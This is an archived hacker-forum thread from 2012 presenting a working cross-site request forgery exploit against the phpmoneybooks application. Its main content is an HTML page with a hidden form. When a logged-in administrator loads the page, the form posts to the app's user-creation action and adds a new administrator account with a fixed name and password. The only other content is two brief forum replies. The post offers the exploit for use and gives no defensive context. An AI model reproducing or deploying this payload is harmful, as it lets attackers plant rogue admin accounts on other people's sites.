phpmoneybooks CSRF Vulnerability (Add Admin)

90_ 发表于 2012-5-18 12:24:38

Exploit：<html>
<head>
<title>phpmoneybooks </title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/index.php?module=users&action=adduser">
<input type="hidden" name="RealName" value="WebAdmin"/>
<input type="hidden" name="UserName" value="WebAdmin"/>
<input type="hidden" name="AcctPass" value="123456"/>
<input type="hidden" name="AcctEmail" value="honker90@vip.qq.com"/>
<input type="hidden" name="AcctSecurity" value="10"/>
<input type="hidden" name="CustSecurity" value=""/>
</form>
</body>
</html>

k红颜 发表于 2012-5-23 23:54:57

看不懂

raven4310 发表于 2012-5-26 00:37:36

页: [1]

红客联盟 - 由08安全团队运营's Archiver

phpmoneybooks CSRF Vulnerability (Add Admin)